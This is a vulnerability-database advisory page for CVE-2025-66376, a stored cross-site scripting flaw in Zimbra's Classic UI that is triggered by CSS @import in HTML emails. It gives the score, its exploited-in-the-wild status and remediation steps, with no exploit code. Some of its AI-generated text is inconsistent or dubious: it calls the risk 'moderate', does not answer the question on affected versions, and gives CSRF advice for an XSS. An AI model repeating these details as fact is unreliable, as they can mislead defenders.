What is the CVSS score of CVE-2025-66376?

CVE-2025-66376 has a CVSS 3.1 base score of 7.2 (High). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N. EPSS exploitation probability: 0.0%.

Which versions of Zimbra Collaboration Suite are affected by CVE-2025-66376?

CVE-2025-66376 presents moderate security risk, a cross-site scripting vulnerability rated CVSS 7.2.

Is CVE-2025-66376 being actively exploited?

Yes, CVE-2025-66376 is listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, confirming active in-the-wild exploitation. Immediate patching is required.

How to fix or mitigate CVE-2025-66376?

Within 24 hours: Identify all affected systems and apply vendor patches immediately. Verify anti-CSRF tokens and content security policies are enforced.

Zimbra Collaboration Suite CVE-2025-66376

HIGH

Cross-site Scripting (XSS) (CWE-79)

2026-01-05 cve@mitre.org

XSS Zimbra Collaboration Suite

7.2

CVSS 3.1 · NVD

Severity by source

NVD PRIMARY

7.2 HIGH

AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

None

Scope

Changed

Confidentiality

Low

Integrity

Low

Availability

None

Lifecycle Timeline

Added to CISA KEV

Mar 18, 2026 - 20:13 cisa

CISA KEV

Analysis Generated

Mar 12, 2026 - 21:54 vuln.today

CVE Published

Jan 05, 2026 - 15:15 nvd

HIGH 7.2

DescriptionCVE.org

Zimbra Collaboration (ZCS) 10 before 10.0.18 and 10.1 before 10.1.13 allows Classic UI stored XSS via Cascading Style Sheets (CSS) @import directives in an HTML e-mail message.

AnalysisAI

Zimbra Collaboration Suite (ZCS) 10.x contains a stored XSS vulnerability in the Classic UI that allows attackers to execute arbitrary JavaScript through CSS @import directives in HTML emails. KEV-listed, this vulnerability (CVE-2025-66376) enables session hijacking and account takeover when administrators or users view malicious emails, making it a high-value target for email-based espionage campaigns.

Technical ContextAI

The vulnerability exploits CSS @import directives within HTML email content. While Zimbra sanitizes many XSS vectors in email rendering, the Classic UI fails to block CSS @import statements that can load external stylesheets or inject JavaScript through CSS expression evaluation. Because the malicious payload is stored in the email itself, it executes every time any user views it, making it particularly effective for targeting organizations using Zimbra's Classic web interface.

RemediationAI

Upgrade to ZCS 10.0.18+ or 10.1.13+ immediately. Switch users to the Modern UI which is not affected. Implement email content filtering to strip CSS @import directives. Monitor for suspicious email content patterns.

CVE-2025-66376 vulnerability details – vuln.today

Back

Zimbra Collaboration Suite CVE-2025-66376

Severity by source

CVSS VectorNVD

Lifecycle Timeline

DescriptionCVE.org

AnalysisAI

Technical ContextAI

RemediationAI

Share

External POC / Exploit Code